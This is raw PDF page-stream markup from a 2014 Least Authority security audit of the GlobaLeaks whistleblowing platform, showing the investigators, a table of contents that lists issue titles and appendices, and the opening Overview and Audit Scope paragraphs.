Q
q
1 0 0 1 62.69291 725.0236 cm
Q
q
1 0 0 1 62.69291 641.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 69 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 69 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Principal Investigators:) Tj T* ET
Q
Q
q
1 0 0 1 23 63 cm
Q
q
1 0 0 1 23 63 cm
Q
q
1 0 0 1 23 51 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Nathan Wilcox <) Tj 0 0 .501961 rg (nathan@LeastAuthority.com) Tj 0 0 0 rg (>) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 23 45 cm
Q
q
1 0 0 1 23 33 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Zooko Wilcox-O'Hearn <) Tj 0 0 .501961 rg (zooko@LeastAuthority.com) Tj 0 0 0 rg (>) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 23 27 cm
Q
q
1 0 0 1 23 15 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Taylor Hornby <) Tj 0 0 .501961 rg (taylor@LeastAuthority.com) Tj 0 0 0 rg (>) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 23 9 cm
Q
q
1 0 0 1 23 -3 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Darius Bacon <) Tj 0 0 .501961 rg (darius@LeastAuthority.com) Tj 0 0 0 rg (>) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 23 -3 cm
Q
q
Q
Q
q
1 0 0 1 62.69291 641.0236 cm
Q
q
1 0 0 1 62.69291 608.0236 cm
q
BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Contents) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 86.02362 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 0 501 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Overview) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 501 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 66.44 0 Td (3) Tj T* -66.44 0 Td ET
Q
Q
q
1 0 0 1 0 483 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Report Revision) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 483 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (3) Tj T* -66.44 0 Td ET
Q
Q
q
1 0 0 1 0 465 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Audit Scope) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 465 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (3) Tj T* -66.44 0 Td ET
Q
Q
q
1 0 0 1 0 447 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Methodology and Disclosure) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 447 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (3) Tj T* -66.44 0 Td ET
Q
Q
q
1 0 0 1 0 429 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Process) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 429 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 66.44 0 Td (4) Tj T* -66.44 0 Td ET
Q
Q
q
1 0 0 1 0 411 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue Investigation and Remediation) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 411 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (4) Tj T* -66.44 0 Td ET
Q
Q
q
1 0 0 1 0 393 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Coverage) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 393 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 66.44 0 Td (6) Tj T* -66.44 0 Td ET
Q
Q
q
1 0 0 1 0 375 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Target Code) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 375 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (6) Tj T* -66.44 0 Td ET
Q
Q
q
1 0 0 1 0 357 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Revision) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 357 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (6) Tj T* -66.44 0 Td ET
Q
Q
q
1 0 0 1 0 339 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Dependencies) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 339 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (6) Tj T* -66.44 0 Td ET
Q
Q
q
1 0 0 1 0 321 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Target Configuration) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 321 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (6) Tj T* -66.44 0 Td ET
Q
Q
q
1 0 0 1 0 303 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Findings) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 303 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 66.44 0 Td (8) Tj T* -66.44 0 Td ET
Q
Q
q
1 0 0 1 0 285 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Vulnerabilities) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 285 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (8) Tj T* -66.44 0 Td ET
Q
Q
q
1 0 0 1 0 267 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue Format) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 267 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (8) Tj T* -66.44 0 Td ET
Q
Q
q
1 0 0 1 0 249 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue A. Plaintext is Written to Disk Before Encryption) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 249 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (9) Tj T* -66.44 0 Td ET
Q
Q
q
1 0 0 1 0 231 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue B. SHA256 of Plaintext File is Saved when Encryption is Enabled) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 231 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (11) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 213 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue C. Receipts are Vulnerable to Guessing) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 213 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (13) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 195 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue D. A Receiver Can Suppress File Encryption With No Warning to Others) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 195 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (15) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 177 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue E. Parallel Requests Bypass Exponentially Increasing Login Delay) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 177 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (16) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 159 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue F. Tip Files Can Be Downloaded Without Authenticating) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 159 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (17) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 141 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue G. Unescaped Characters Put Into ) Tj /F3 10 Tf 0 0 0 rg (Content-Disposition ) Tj /F1 10 Tf 0 0 .501961 rg (Header) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 141 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (19) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 111 cm
q
BT 1 0 0 1 40 14 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue H. Plaintext File Kept on Server when Whistleblower Does Not Finish) Tj T* (Submitting Tip) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 123 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (21) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 93 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue I. User Input Written to Logs) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 93 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (23) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 75 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue J: Attacker May Be Able To Extract Secrets Through Side-Channel Attacks) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 75 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (25) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 57 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue J.1: Timing Leak of File Download Token) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 57 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (26) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 39 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue J.2: Timing Leak of Collection Download Token) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 39 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (27) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 21 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue J.3: Timing Leak of XSRF Token) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 21 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (28) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 3 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue J.4: Timing Leak of Session ID) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 3 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (29) Tj T* -60.88 0 Td ET
Q
Q
q
Q
Q
 
endstream
endobj
% 'R344': class PDFStream 
344 0 obj
% page stream
<< /Length 8286 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 189.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 0 561 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue J.5: Timing Leak of Usernames) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 561 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (30) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 543 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue J.6: Timing Leak of Receipt Hashes) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 543 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (31) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 525 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue K: Secrets Generated with Non-CSPRNG) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 525 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (32) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 507 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Design and Implementation Analysis) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 507 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (34) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 489 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Commendations) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 489 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (34) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 471 cm
q
BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Recommendations) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 471 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (34) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 453 cm
q
BT 1 0 0 1 60 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Coding Practices) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 453 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (34) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 435 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Future Work) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 435 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (36) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 417 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Online Guessing Attacks) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 417 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (36) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 399 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Side-Channel Attacks) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 399 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (36) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 381 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Eliminating Threads) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 381 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (36) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 363 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Open Questions & Concerns) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 363 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (36) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 345 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Appendix A. Work Log) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 345 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (39) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 327 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Prior to This Audit) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 327 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (39) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 309 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-01-28 to 2014-02-03) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 309 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (39) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 291 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-04) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 291 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (39) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 273 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-05) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 273 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (39) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 255 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-06) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 255 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (40) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 237 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-07) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 237 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (41) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 219 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-10) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 219 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (41) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 201 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-11) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 201 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (41) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 183 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-12) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 183 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (41) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 165 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-13) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 165 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (41) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 147 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-14) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 147 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (42) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 129 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-17) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 129 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (42) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 111 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-18) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 111 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (42) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 93 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-19) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 93 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (42) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 75 cm
q
BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-20) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 75 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (42) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 57 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Appendix B. Brainstorming Notes) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 57 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (43) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 39 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Appendix C. Script for Issue E) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 39 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (46) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 21 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Appendix D. Side-Channel Attack Proof of Concept) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 21 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (47) Tj T* -60.88 0 Td ET
Q
Q
q
1 0 0 1 0 3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Appendix E. Computing Multiple Target Guessing Success Probabilities) Tj T* ET
Q
Q
q
1 0 0 1 397.8898 3 cm
q
0 0 .501961 rg
0 0 .501961 RG
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (49) Tj T* -60.88 0 Td ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 189.0236 cm
Q
 
endstream
endobj
% 'R345': class PDFStream 
345 0 obj
% page stream
<< /Length 2379 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 744.0236 cm
q
BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Overview) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 702.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.050651 Tw (Least Authority performed a security audit of GlobaLeaks on behalf of the Open Technology Fund. The) Tj T* 0 Tw .020751 Tw (audit consisted primarily of developer interviews, design analysis, and code review. We also experimented) Tj T* 0 Tw (with software locally to test hypotheses.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 672.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Report Revision) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 642.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.200651 Tw (This report is the final draft of the audit findings, delivered on 2014-03-21. Several unfinished revisions) Tj T* 0 Tw (were shared with the development team throughout the audit.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 612.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Audit Scope) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 582.0236 cm
q
BT 1 0 0 1 0 14 Tm 3.307674 Tw 12 TL /F1 10 Tf 0 0 0 rg (The focus for this audit was the ) Tj 0 0 .501961 rg (GLBackend ) Tj 0 0 0 rg (and ) Tj 0 0 .501961 rg (GLClient ) Tj 0 0 0 rg (codebases. Interactive and automated) Tj T* 0 Tw (penetration testing targeted installations local to the auditors.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 552.0236 cm
q
